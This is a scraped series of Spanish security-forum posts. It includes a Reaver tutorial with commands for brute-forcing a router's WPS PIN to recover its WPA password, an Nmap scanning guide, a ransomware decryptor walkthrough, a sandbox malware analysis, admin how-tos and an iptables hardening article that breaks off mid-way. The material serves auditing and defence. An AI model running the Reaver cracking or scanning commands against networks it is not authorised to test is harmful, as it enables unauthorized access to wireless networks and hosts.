Para ejecutar el REAVER, abrimos una terminal y escribimos en ella la siguiente línea de comandos y pulsamos intro:

Código: php
Reaver –i mon0 –b A4:52:6F:E2:4D:56 –VV


Explicaré brevemente esta linea de comandos anterior  –i mon0 =nuestra tarjeta de red en modo monitor. –b A4:52:6F:E2:4D:56=el BSSID de nuestra red. –vv=modo verbose, para ver lo que está pasando quedaría algo así.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez hemos introducido la anterior línea de comandos y pulsado intro, la herramienta comenzará a trabajar ella solita, ya lo único que debemos hacer es esperar y ser muy pacientes, ya que esta operación puede tardar entre 4 y 15 horas, todo dependerá de la calidad de la señal de red y de nuestro equipo.

Una vez a acabado de trabajar el REAVER nos mostrará los siguientes datos en la terminal:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos ver en la imagen anterior, ya tenemos recuperada nuestra contraseña y el pin de nuestra red, ES IMPORTANTE GUARDAR EL PIN en un sitio donde lo podamos ver cuando queramos, porque una vez tenemos el pin de la red, con esta línea de comandos:

Código: php
Reaver –i mon0 –b A4:52:6F:E2:4D:56 –p 13409708 –VV


Si nos fijamos, hemos añadido al comando anterior de REAVER el parámetro  (p) seguido del nº de pin, pues bien, de esta forma el crackeo no tardará más de 10 minutos la próxima vez que perdamos la contraseña J

Ahora vamos a explicar brevemente  algunos comandos opcionales  de REAVER y su funcionalidad:


  • -c para seleccionar el canal de la red
  • -e para seleccionar el nombre de la red(Essid)
  • -t El tiempo de espera de recepción por defecto es 5 segundos con este comando podemos ponerlo hasta un mínimo de 1 segundo.
  • –fixed con este comando hacemos que REAVER cambie consecutivamente de canal a la vez que la red, "si esta lo hiciera".
  • –lock-delay= con este comando le diremos a REAVER cada cuanto tiempo en segundos, queremos que reanude la operación ya que algunas redes cada cierto tiempo bloquea el ataque al wps.

    Por último quiero destacar que hay más comandos que pueden usarse con REAVER,  pero sin duda con los nombrados en este breve repaso de la herramienta, nos será bastante fácil recuperar (Crackear) la contraseña de nuestro router.

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#64
Estas navidades está pegando fuerte un ransomware bautizado por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta como Gomasom (GOogle MAil ranSOM) ya que utiliza direcciones de Gmail en los nombres de ficheros cifrados, por ejemplo [email protected]_.crypt, a los que los usuarios infectados deben escribir para seguir las intrucciones de "rescate".

El propio Fabian ha creado una herramienta muy sencilla decrypt_gomasom.exe(descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) que permite obtener la clave de descifrado simplemente arrastrando un fichero cifrado y el equivalente original sin cifrar:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es decir, al menos necesitaremos un fichero original para poder recuperar el resto. Si no lo tenemos podríamos buscar por ejemplo un PNG de la instalación por defecto de Windows, obtenerlo de otro equipo o descargarlo de Internet y utilizarlo para obtener la clave.

Básicamente el programa realiza una fuerza bruta probando diferentes claves para obtener el mismo fichero cifrado, cuando la encuentre (puede llevar su tiempo) se nos mostrará una ventanita como la siguiente:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y después de pulsar el botón OK nos aparecerá una ventana con el listado de directorios y ficheros a descifrar (si no aparece podemos añadirlo a mano):

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Finalmente pulsaremos el botón de descifrar y después del proceso se nos mostrarán los resultados:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuentes:
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#65
Android / Instala Kali Linux en tu Android
Enero 04, 2016, 01:56:19 PM

Nuestro dispositivo Android nos permite realizar infinidad de cosas, pero que os parece instalar Kali Linux en nuestro smartphone... Suena bien ¿verdad? Para los amantes de la auditoria en seguridad informática seguro que perderán unos minutos de su tiempo en pararse a leer este post para saber si realmente merece la pena o no.

¿Qué es Kali Linux?

Kali Linux es una distribución basada en Debian GNU/Linux diseñada principalmente para la auditoría y seguridad informática en general. Fue fundada y es mantenida por Offensive Security Ltd. Mati Aharoni and Devon Kearns, ambos pertenecientes al equipo de Offensive Security, desarrollaron la distribución a partir de la reescritura de BackTrack,que se podría denominar como la antecesora de Kali Linux.

Kali Linux trae preinstalados más de 600 programas incluyendo Nmap (un escáner de puertos), Wireshark (un sniffer), John the Ripper (un crackeador de passwords) y la suite Aircrack-ng (software para pruebas de seguridad en redes inalámbricas). Kali puede ser usado desde un Live CD, live-usb y también puede ser instalada como sistema operativo principal.


Requisitos
  • Android 2.1 o mayor, rooteado.
  • Al menos 5GB libres de espacio en memoria interna o externa.

    Instrucciones
  • Instalar la aplicación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
  • Instalar la aplicación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

    Descargamos la imagen en el ordenador desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y luego las colocamos dentro de la memoria SD de nuestro Android.

    Abrimos la aplicación "Complete Linux Installer", y en el menú izquierdo escogemos "Launch", en el despegable elegimos "Kali" y luego en "Settings" debemos ingresar a "Edit", ahí debemos navegar en los directorios y buscar la imagen que colocamos desde el ordenador en nuestro dispositivo.



    Escogemos "Start Linux" y abrirá una terminal, debemos presionar la tecla "Enter" en el teclado, nos comenzará a pedir una serie de configuraciones, podemos dejar las sugeridas. Entre los datos que pide esta la resolución de pantalla con que iniciaremos VNC y el usuario y password de nuestro Kali.

    Abrimos la aplicación VNC per Android y configuramos el usuario y password que colocamos en la terminal en los campos respectivos (Nickname y Password), en Address colocamos localhost, el puerto lo dejamos en 5900.

    Damos Click en Connect, y si todo salió bien deberíamos haber ingresado a nuestro entorno gráfico de Kali Linux.

    Saludos,
    Stiuvert
#66
Hola underc0ders, encontré unas prácticas bastante interesantes en el Blog de JCHIERRO y he decido compartirlo ya que seguramente muchos usarán o se estarán iniciando en Windows Server.
Active Directory permite hacer muchísimas cosas, entre algunas podemos encontrar: como denegar funciones, administrar inicio de sesiones en los equipos conectados en Red, administración de políticas en toda la Red, crear recursos compartidos, etc.

Sin más, dejo los enlaces a las prácticas:

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#67
Back-end / Tutorial: Publicar un post en twitter desde PHP
Diciembre 26, 2015, 02:41:41 PM

Hoy veremos como publicar automáticamente posts en Twitter mediante su API, de manera muy sencilla.

Lo primero que tenemos que hacer es crearnos una aplicación desde nuestra cuenta de twitter No tienes permitido ver los links. Registrarse o Entrar a mi cuenta una vez creado vamos a la pestaña de access tokens, le damos al botón generar tokens y una vez hecho, ya podremos copiar los tokens generados para posteriormente usarlos.

Una vez hecho esto, lo que recomiendo es usar una librería ya desarrollada, existen muchas muy completas, pero personalmente, la que más me gusta es codebird-php No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es muy sencilla de utilizar y funciona perfectamente.

Simplemente añadimos la librería a nuestro composer, ejecutamos composer install y ya podemos usarla.

Código: php
{
    "repositories": [
        {
            "type": "git",
            "url": "https://github.com/jublonet/codebird-php.git"
        }
    ],
    "require": {
        "jublonet/codebird-php": "2.7.2"
    }
}


Una vez hecho esto, ya podemos usar la librería, a continuación veremos un par de ejemplos de como postear:

Código: php
\Codebird\Codebird::setConsumerKey("your_ConsumerKey", "your_ConsumerSecret");
$cb = \Codebird\Codebird::getInstance();
$cb->setToken("your_AccessToken", "your_AccessTokenSecret");

$params = array(
  'status' => 'Auto Post on Twitter with PHP http://goo.gl/OZHaQD #php #twitter'
);
$reply = $cb->statuses_update($params);


Código: php
\Codebird\Codebird::setConsumerKey("your_ConsumerKey", "your_ConsumerSecret");
$cb = \Codebird\Codebird::getInstance();
$cb->setToken("your_AccessToken", "your_AccessTokenSecret");

$params = array(
  'status' => 'Auto Post on Twitter with PHP http://goo.gl/OZHaQD #php #twitter',
  'media[]' => '/path/to/picture.png'
);
$reply = $cb->statuses_updateWithMedia($params);


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#68

¿Eres usuario de Windows y virtualizas tus sistemas operativos en VirtualBox? Seguramente has podido tener problemas a la hora de instalar Guest Additions en Linux, así que hoy explicaré como hacerlo en Kali 2.0 ya que es una distribución utilizada para casos puntuales ya que no es un sistema para tenerlo de base.

¿Qué son las VirtualBox Guest Additions?

VirtualBox Guest Additions es un paquete especial de software que forma parte de VirtualBox y que debe instalarse en cada una de las máquinas virtuales para mejorar el rendimiento y añadir nuevas funciones. Consisten en una serie de controladores (drivers) y aplicaciones para el sistema virtualizado que lo optimizan para un mejor rendimiento y usabilidad.
Las Guest Additions (aplicaciones del huesped) se encuentran disponibles en una imagen de CD-ROM con el nombre VBoxGuestAdditions.iso. que debemos montar en nuestra máquina virtual como una unidad de CD e instalarlas desde ella.

Las Guest Additions nos ofrecen las siguientes características:

  • Integración del cursor del ratón. Esto implica que podemos mover el ratón libremente entre la máquina virtual y la real sin necesidad de pulsar ninguna tecla para capturarlo/liberarlo. Hace que sea mucho más cómodo el usar la máquina virtual.

  • Mejor soporte de vídeo. En principio el controlador de vídeo virtual que utiliza VirtualBox para cualquier sistema operativo virtualizado proporciona solamente funciones básicas. Sin embargo, el driver de vídeo que se instala con las Guest Additions nos ofrece no sólo una buena aceleración de vídeo, sino también resoluciones más altas.

  • Sincronización horaria. Gracias a las Guest Additions, VirtualBox se asegura de que la hora del sistema virtualizado esté mejor sincronizada.

  • Carpetas compartidas. Una de las características más importantes es la de las carpetas compartidas porque es una forma fácil de poder intercambiar archivos entre el sistema real y el virtualizado.

  • Ventanas sin costuras. Esta característica consiste en mostrar una ventana del sistema virtualizado como si formara parte de nuestro sistema real.

  • Portapapeles compartido. Al igual que las carpetas compartidas el poder compartir el portapapeles es de gran utilidad. Gracias a esta característica podemos copiar y pegar independientemente de que estemos en la máquina virtual o real.

  • Entrada automática en Windows.

    En definitiva, si usas VirtualBox no dejes de instalar las Guest Additions en cada una de las máquinas virtuales para poder aprovecharlas mejor y para que sean mucho más cómodas de usar.

    Como Instalar en Kali Linux 2

    Los pasos a seguir son bastantes sencillos, lo primero será cargar el sistema de Guest, vamos a la parte de "Dispositivos" y le damos  "Inserte la Imagen cd de la <<Guest Additions>>...



    Se nos cargara una imagen de CD, que al momento de iniciar el autoarranque nos mostrará un error, lo cerramos y abrimos la consola. Ingresamos el siguiente comando.

    Código: bash
    cp /media/cd-rom/VBoxLinuxAdditions.run /root/
    #Copia el archivo, pero ojo,  la ruta "cd.rom" puede variar a "cd-rom1"

    Código: bash
    chmod 755 /root/VBoxLinuxAdditions.run
    #Da los permisos de ejecución del archivo

    Código: bash
    cd /root 
    #Entra a la carpeta /root

    Código: bash
    ./VboxLinuxAdditions.run
    #Ejecuta el instalador...



    Comienza la Instalación y listo, cuando termine, puedes ejecutar el comando "reboot"
    y ya iniciará tu sistema virtualizado con todas las ventajas que tiene Guest.

    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#69
Estoy buscando un plugin gratuito para WordPress que me permita insertar productos sin necesidad de usar "WooComerce" ya que solamente quiero tener imágenes de un producto, características y su precio. Actualmente estoy utilizando "Spider catalog" pero como es de pago solamente tengo las opciones por defecto.

Adjunto imagen de lo que estoy buscando:



Si conocen algún plugin similar les agradecería su ayuda  :P

Saludos
#70
Ha llegado a ser una de las herramientas imprescindibles para todo administrador de sistema, y es usado para pruebas de penetración y tareas de seguridad informática en general. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como muchas herramientas usadas en el campo de la seguridad informática, es también una herramienta muy utilizada para hacking. Los administradores de sistema pueden utilizarlo para verificar la presencia de posibles aplicaciones no autorizadas ejecutándose en el servidor, así como los crackers pueden usarlo para descubrir objetivos potenciales.

Nmap permite hacer el inventario y el mantenimiento del inventario de computadores de una red. Se puede usar entonces para auditar la seguridad de una red, mediante la identificación de todo nuevo servidor que se conecte. Nmap es a menudo confundido con herramientas para verificación de vulnerabilidades como Nessus. Nmap es difícilmente detectable, ha sido creado para evadir los Sistema de detección de intrusos (IDS) e interfiere lo menos posible con las operaciones normales de las redes y de las computadoras que son analizadas.

Como todos sabemos ahora, Nmap[/b] (Network Mapper) es un escáner de puertos invisible ampliamente utilizado por los expertos en la seguridad de redes (incluidos los forenses y expertos en pruebas de Penetración). En este artículo vais a ver los diferentes tipos de escaneos de Nmap, sus técnicas, la comprensión del propósito y los objetivos de cada análisis, sus ventajas y desventajas sobre las herramientas de escaneo, que podría ser mejor para evadir los firewalls y IDS (hasta cierto punto) y mucho más.

Se explicaran las técnicas básicas de escaneo, opciones de descubrimiento de equipos, las opciones de escaneo de puertos, las técnicas utilizadas en la detección del sistema operativo y de los servicios que se ejecutan en el sistema.
También doy por sentado que tienes Nmap ya instalado en tu sistema.

Empezamos con uno de los análisis más básicos y por defecto, primero sin el uso de parámetros.
Abres el terminal, en Ubuntu ctrl+alt+t

$ sudo nmap 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta es una exploración básica de la dirección IP local 192.168.1.34, utilizamos sudo para obtener privilegios de administrador, y le damos el objetivo de Nmap.
Por otra parte, también puedes escanear varias direcciones IP a la vez, así que por ejemplo se puede:

$ sudo nmap 192.168.1.33 192.168.1.36 192.168.1.38 192.168.1.39

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ten en cuenta que hay un espacio entre cada dirección IP completa, en el ejemplo anterior he utilizado 4 direcciones IP de destino para realizar la búsqueda a la vez.

Discovery (Descubrimiento)

Antes de escanear un puerto de destino, Nmap intenta enviar una solicitud de eco ICMP para ver si el host remoto está "vivo". Esto puede ahorrar tiempo al escanear múltiples hosts, asi nmap no perderá el tiempo tratando de sondear los hosts que están fuera de línea.


Don't ping -PN (No ping -PN)

Con esta opción, Nmap simplemente no hace ping al destino/s

$ sudo nmap  -PN 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Only Ping scan -sP (Sólo escaneo ping -sP)

Esto se utiliza para realizar una exploración simple de ping de los host

$ sudo nmap -sP 192.168.1.34

Esta exploración es útil cuando deseas hacer una búsqueda rápida de la red de destino para ver qué hosts están en línea sin tener que detener el escaneo con los objetivos de puertos abiertos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ARP Ping scan (Escaneo ping ARP)

La opcion –PR indica a Nmap realizar una exploración ARP (Address Resolution Protocol) de ping en la ip de destino deseado.

$ sudo nmap -PR 192.168.1.3

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La opción -PR ignora escanear una red local. Este tipo de descubrimiento es mucho más rápido en comparación con los otros métodos de ping. Tiene la ventaja añadida de ser más apropiado ya que el LAN host no puede bloquear la petición ARP.

NOTA: este tipo de exploración no funciona en los objetivos que no están en el rango de subred.

Port scanning options (Opciones de escaneo de puertos)

Performing Fast scan (Realización de análisis rápido)


La opción -F indica a nmap realizar un análisis de sólo los 100 puertos más utilizados.

$ sudo nmap -F 192.168.1.34


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nmap escanea los primeros 1000 puertos utilizados por defecto. La opción -F reduce esa cifra a 100. Esto puede aumentar drásticamente la velocidad de escaneo, al mismo tiempo comprueba los puertos más utilizados.

Scan only specific ports (Sólo se analizan puertos específicos)

La opción -p se utiliza para instruir a nmap a escanear un puerto especificado/s
Para comprobar si el puerto telnet está abierto:

$ sudo nmap -p23 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El ejemplo anterior muestra el uso de -p para escanear el puerto 23.
También puede escanear más puertos mediante la adición de una coma , entre cada puerto o también realizar una exploración de un rango de puertos, puedes indicarlo con un –

$ sudo nmap -p 22,25,53 ,80-200 192.168.1.34


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este ejemplo la opción -p se utiliza para escanear los puertos 22,25,53 y van desde 80 hasta 200
Nota: La salida sólo muestra los puertos abiertos.

Scan Ports by name (Escanear puertos por su nombre)

La opción -p también puede ser utilizada para escanear los puertos por su nombre

$ Nmap -p smtp, ftp 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El ejemplo anterior muestra cómo hacer la exploración del estado de los puertos SMTP y FTP mediante el uso de la opción -p con el nombre de los puertos.

Scan all ports (Analizar todos los puertos)

La opcion -p "*" es una gran opción para escanear todos los puertos TCP 65535/puertos IP de la máquina de destino.

$ Nmap -p "*" 192.168.1.34

Elegir entre TCP y UDP

Y por último con la opción -p también puedes optar por analizar solo algunos de los puertos TCP o UDP

$ nmap -p T:3000-4000 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En la imagen de arriba se especifica un rango de puertos con la (T), sólo TCP, mientras que U:60000- También se podría añadir, en ese caso habría supuesto sólo el protocolo UDP.

Operating system and service detection (Detección de sistema operativo y servicios)

El parámetro -o permite activar el sistema de detección de sistema operativo de Nmap en la exploración.

nmap -O 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Attempt to guess an unknown O.S  (Tratar de adivinar un O.S desconocido)

Si Nmap no es capaz de identificar el sistema operativo, puedes forzarlo a que lo adivine mediante el uso de la opción -osscan-gues

$ nmap -O – osscan-guess 192.168.1.1

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Service version detection (Detección de versión de servicios)

El parámetro -sV se utiliza para detectar la versión de los servicios.

$ Nmap -sV 192.168.1.34

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esta amigo y amigas es la primera parte de esta visión general de los parámetros más utilizados en Nmap, estad atentos a la parte 2.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de James Hawkins
#71
Dudas y pedidos generales / Router en modo bridge
Octubre 11, 2015, 06:11:36 AM
Buenas,

Estoy haciendo en mi casa un punto WiFi con el modo "Wireless Bridge", lo he configurado con la MAC del router que quiero que haga de "Bridge" y luego el router Bridge le he configurado su WAN según el siguiente tutorial:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Antes de nada puse los rangos están en 192.168.1.10 (router ADSL) y 192.168.1.11 (router bridge). Ambos les he habilitado el DHCP para que puedan dar direcciones IP. Y a la hora de probarlo la conexión se establece y me da la dirección IP correctamente pero hago ping y no tengo conexión.

Nota: Hago ping del router ADSL al Router Bridge y es correcto, en cambio si hago ping del router bridge al router ADSL no da ping.

A ver si alguien me puede echar un mano ya que seguramente me faltará algún paso. Si veis el tutorial anterior veréis los pasos que he estado haciendo ya que me he fijado en ese tutorial.


Gracias

#72
En la última semana hemos recibido en nuestro laboratorio unos binarios provenientes de campañas de phishing y envío de malware, que hemos procedido a analizar de una forma muy práctica y bastante efectiva por el resultado de dicho análisis, que nos permite rápidamente extraer unas primeras contramedidas por si ha habido alguna infección. Vamos a analizar malware con Anubis.


El último de los ficheros lo hemos recibido esta misma mañana y es el que usaremos en este artículo.


Concretamente se trata de un fichero adjunto en este mensaje que "generosamente" Bobby nos envía y que se le había olvidado adjuntar en un correo anterior. Todo un detalle.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Un primer paso era analizar el fichero con el antivirus instalado en uno de los equipos usados como sandbox, con antivirus Avira actualizado hasta el día. En ese primer análisis no salió ninguna detección. Acto seguido, decidimos probar con los 57 motores de análisis de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (donde pudimos comprobar que el motor de Avira no lo detectaba), obteniendo en un primer análisis sólo 7 detecciones de los 57 motores, y al cabo de 2 horas un resultado de 12 detecciones.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Aunque nuestro antivirus Avira no lo había detectado, gracias a VirusTotal pudimos comprobar que efectivamente se trata de malware, concretamente el troyano Trojan.Upatre.Gen.3.


Como desconocemos lo que este troyano es capaz de hacer, y queremos saber posibles contramedidas por si ha habido alguna infección, procedemos a subir el archivo a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, donde además de un análisis del binario, lo desplegará y ejecutará en una máquina Windows propia, nos indicará las modificaciones en el sistema de ficheros, posibles entradas de registro y lo que es muy interesante también, nos facilitará una captura del tráfico generado por este malware tras su ejecución.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como podemos ver en la imagen anterior, tras subir el fichero a Anubis y ser analizado, tenemos a nuestra disposición el informe del análisis en varios formatos, y en la parte inferior un enlace al fichero pcap resultante de la captura de tráfico realizada.


Veamos qué tiene ese fichero si lo abrimos con Wireshark:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si filtramos los paquetes por tráfico http podemos ver algunas cosas interesantes. Por ejemplo que hace una petición a la IP 91.198.22.70. ¿Qué habrá en ese recurso?


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


¡Anda qué curioso! Es para saber desde qué IP pública nos hemos infectado. Sigamos. Podemos ver también varias peticiones para descarga de supuestos ficheros PDF, que seguro que no lo son y a su vez realizarán otro tipo de acciones maliciosas como descarga de otros binarios necesarios para lanzar su ataque, que tiene toda la pinta de CryptoLocker.


Como podéis ver, haciendo uso de servicios online totalmente gratuitos podemos de forma rápida y sencilla hacer un análisis del malware y sacar unas primeras conclusiones, y lo que es más importante, aplicar unas contramedidas que mitiguen o reduzcan el riesgo que esta amenaza pueda suponer para los sistemas de información de cualquier organización.


¿Contramedidas? Obviamente en primer lugar realizar un análisis de los posibles equipos infectados, concienciar al usuario de no abrir archivos adjuntos en correos de remitentes desconocidos y aplicar algunas reglas en la seguridad perimetral, por ejemplo, denegar el tráfico desde / hacia las direcciones IP observadas en la captura de tráfico. Se ha comprobado que están reportadas como servidores maliciosos.


Por cierto, en una de esas direcciones IP nos espera un bonito RouterOS de MikroTik.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como siempre, espero que sea de vuestro interés, y nos leemos en siguientes artículos.

¡Saludos!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Edición: Anubis está caido, alternativas recomendables.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --->En mantenimiento
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#73

Contenido del curso:

Crea aplicaciones para dispositivos móviles Android utilizando la interfaz del sistema operativo Android Lollipop, la quinta versión del popular sistema operativo de Google. En este curso aprenderemos las nuevas metáforas de diseño Android, los detalles sobre la más reciente paleta cromática, utilizaremos sus nuevos componentes, animaciones y transiciones para que puedas crear aplicaciones modernas que aprovechen al máximo lo último de Android.

Detalles del curso:

Crea aplicaciones Android utilizando la nueva interfaz del sistema operativo Android Lollipop, la quinta versión del popular sistema operativo de Google.
En este curso exploraremos paso a paso los detalles de los nuevos componentes de Android Lollipop como los nuevos cards ReciclerViews, utilizaremos las guías gráficas para crear una aplicación con una apariencia moderna y crearemos animaciones y transiciones adaptadas a esta nueva experiencia de Android.
Aprenderemos las nuevas metáforas de diseño Android, para que puedas crear aplicaciones modernas que aprovechen al máximo lo último de Android.

Descripción descarga:

16 vídeos | Duración: 1 hora 16 minutos | Idioma: Español | Tamaño:255 MB

Nuevo enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#74
El otro día estuve viendo un esquema del sistema de archivos de Linux realizado por  @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y como tenía un script que generaba la estructura he decido postearlo. Básicamente consiste en crear los directorios y la estructura.

Servirá para los que recién empiezan en Bash, algo sencillo para ir jugando con menús y comparaciones. Tengo una segunda versión que reliza copias de seguridad si lo encuentro lo postearé aunque animo a los usuarios a que realicen sus Scripts.

Un saludo

Código: bash
#!/bin/bash
# Crear un script que genere una estructura de directorios y cumpla las normas FHS.
# By Stiuvert

opc=1
flag=0

while [ $opc -ne 0 ];do
clear
echo '1. - Crear estructura de directorios FHS'
echo '2. - Crear estructura en el directorio /usr'
echo '3. - Crear estructura en el directorio /var'
echo '0. - Salir'
echo -n "Elige una opción: "
read opc


# Estructura FHS
if [ $opc -eq 1 ];
then
    clear
echo '- /proc'
echo '- /sys'
echo '- /cdrom'
echo '- /initrd'
echo '- /bin'
echo '- /boot'
echo '- /dev'
echo '- /etc'
echo '- /home'
echo '- /lib'
echo '- /media'
echo '- /mnt'
echo '- /opt'
echo '- /root'
echo '- /sbin'
echo '- /tmp'
echo '- /usr'
echo '- /var'
    echo 'Crear los siguientes directorios (s/n): ' #pregunta si o no
read crear
if [ $crear == "s" ]; # 'S' creamos los directorios
then
   mkdir /{proc,sys,cdrom,initrd,bin,boot,dev,etc,home,lib,media,mnt,opt,root,sbin,tmp,usr,var}
   flag=1
   sleep 1
fi
if [ $crear == "n" ]; # 'n' vuelve al menu principal
then [ $opc -eq 0 ];
fi
fi


# El directorio /usr
if [ $opc -eq 2 ];
then
if [ $flag -eq 1 ];
then
    clear
echo '- /usr/bin'
echo '- /usr/include'
echo '- /usr/lib'
echo '- /usr/local'
echo '- /usr/sbin'
echo '- /usr/src'
    echo 'Crear los siguientes directorios (s/n): ' #pregunta si o no
read crear
fi

if [ $crear == "s" ]; # 'S' creamos los directorios
then
mkdir /usr/{bin,include,lib,local,sbin,src}
sleep 1
fi

if [ $crear == "n" ]; # 'n' vuelve al menu principal
then [ $opc -eq 0 ];
fi
fi


# El directorio /var
if [ $opc -eq 3 ];
then
if [ $flag -eq 1 ];
then
    clear
echo '- /var/cache'
echo '- /var/lib'
echo '- /var/lock'
echo '- /var/log'
echo '- /var/mail'
echo '- /var/run'
echo '- /var/spool'
echo '- /var/tmp'
    echo 'Crear los siguientes directorios (s/n): '
read directorios
fi

if [ $directorios == "s" ]; # 'S' creamos los directorios
then
mkdir /var/{cache,lib,lock,log,mail,run,spool,tmp}
sleep 1
fi

if [ $crear == "n" ]; # 'n' vulve al menu principal
then [ $opc -eq 0 ];
fi
fi

done
#75
GNU/Linux / Configuración segura de Iptables
Julio 30, 2014, 06:07:19 PM
El siguiente artículo se va a centrar en cómo configurar un firewall iptables de forma segura y en cómo evitar que, ante un escaneo de puertos, se obtenga información diversa acerca del Sistema Operativo instalado en el servidor escaneado que pueda ayudar a descubrir vulnerabilidades. No todos los firewalls lo consiguen ya que cada uno actúa con un comportamiento distinto y, aunque ofrecen protección cerrando los puertos, no siempre se filtran de la forma más correcta.


UN POCO DE HISTORIA...


Actualmente, existen multitud de firewalls por software, algunos dedicados que proporcionan una estabilidad más que aceptable y que están integrados en el propio Sistema Operativo siendo distribuciones propias y otros que, por ejemplo, son simplemente interfaces gráficas que facilitan la tarea para la mayoría de usuarios y que proporcionan una seguridad por defecto para un uso más doméstico. Éstos últimos, en entornos más exigentes no proporcionan una respuesta pro-activa ante un escaneo y/o posterior ataque. En ambos casos, muchos de estos firewalls utilizan como núcleo central iptables.


Iptables, cómo se le conoce comúnmente, en realidad proviene del proyecto Netfilter/Iptables (año 1998 sobre núcleos Linux 2.4 y superior). Dicho proyecto es la evolución del ipchains del núcleo Linux 2.2 que a su vez provenía del ipfwadm de BSD. La diferencia radica en que no existía un framework general que permitiese el manejo de paquetes, siendo antiguamente alteraciones directas del código de red para manipular los paquetes.


Actualmente, netfilter permite no sólo filtrar paquetes y hacer NAT (que es lo que hacían ipchains e ipfwadm) sino que separa las operaciones sobre los paquetes en filtrado, NAT y seguimiento de conexiones, siendo cada una por su parte capaz de conectarse a las herramientas de netfilter para acceder a los paquetes.


Esta división que proporciona netfilter le aporta la capacidad de monitorizar el estado de una conexión y redirigir, modificar o incluso detener los paquetes de datos basados en el estado de la conexión y no sólo por la dirección de origen, de destino sino incluso por el contenido del paquete.


Iptables por su parte, proporciona una herramienta mediante scripts para definir reglas que indican qué hacer con un determinado paquete. Las reglas se agrupan en cadenas de modo que se organizan para definir un comportamiento concreto ante un paquete IP determinado.


Con Iptables, es preciso controlar de forma más detallada qué reglas configurar y definir paso a paso que se va a permitir y que no, dejando a la habilidad del administrador la posibilidad de que sea más seguro y la certeza de no haber dejado algún agujero o alguna regla que no sea todo lo explícita que debiera posibilitando que se pueda falsear el estado del protocolo e incluso, penetrar en el sistema. Es aquí donde radica la importancia de securizar no sólo el iptables sino también de configurar reglas preventivas para conseguir hacer invisible el equipo desde Internet y asegurarse de no exponer nada que pueda suponer una brecha de seguridad en el sistema.


El modo es simple y complejo a la vez, consiste en hacer que ante una petición de protocolo a la dirección IP del sistema, el firewall no responda con un "port closed" (cerrado) sino con un "stealth" (invisible/filtrado) dificultando así una posible detección de un agujero y/o debilidad en el sistema con la posibilidad de una penetración de un hacker en la red.


Si bien la parte del proyecto referente al iptables proporciona herramientas y scripts, no hay que confundirlas con el propio programa iptables. El software (por norma general) se localiza en /usr/sbin y el script de arranque en /etc/init.d.


Antes de continuar con iptables y su configuración es importante remarcar qué se entiende por "escaneo" o "scan" y de qué forma se suele comportar un firewall. El termino "scan" o "escaneo de puertos" se emplea para designar una acción que por medio de uno o varios programas analiza una dirección IP (asociada a un ordenador o maquina conectada en una red, sea una LAN, WAN o INTERNET), en busca de puertos (o canales de comunicación) y de servicios publicados.


En un escaneo de puertos, se detecta si existen canales abiertos, cerrados o invisibles/filtrados. Inicialmente, se podría decir que el estado ideal de un puerto puede ser cerrado, pero éste estado ofrece información al atacante acerca de que existe una máquina conectada tras esa dirección IP y que si se profundiza con ataques de protocolo inválidos, heurísticos y escaneos silenciosos puede darse el caso de traspasar el firewall e infiltrarse en el sistema. Por este motivo, cada vez se emplea más tiempo y recursos en mejorar la seguridad y filtrar y denegar todo lo que no se desea.


CÓMO FUNCIONA UNA CONEXIÓN TCP


Para entender mejor cómo funciona un escaneo es necesario conocer de qué forma funciona el establecimiento de una conexión:


Cuando un host A quiere establecer una conexión con otro host B, se produce una conversación como la siguiente:


Citar

1. (A) --&gt; [ SYN] --&gt; (B)


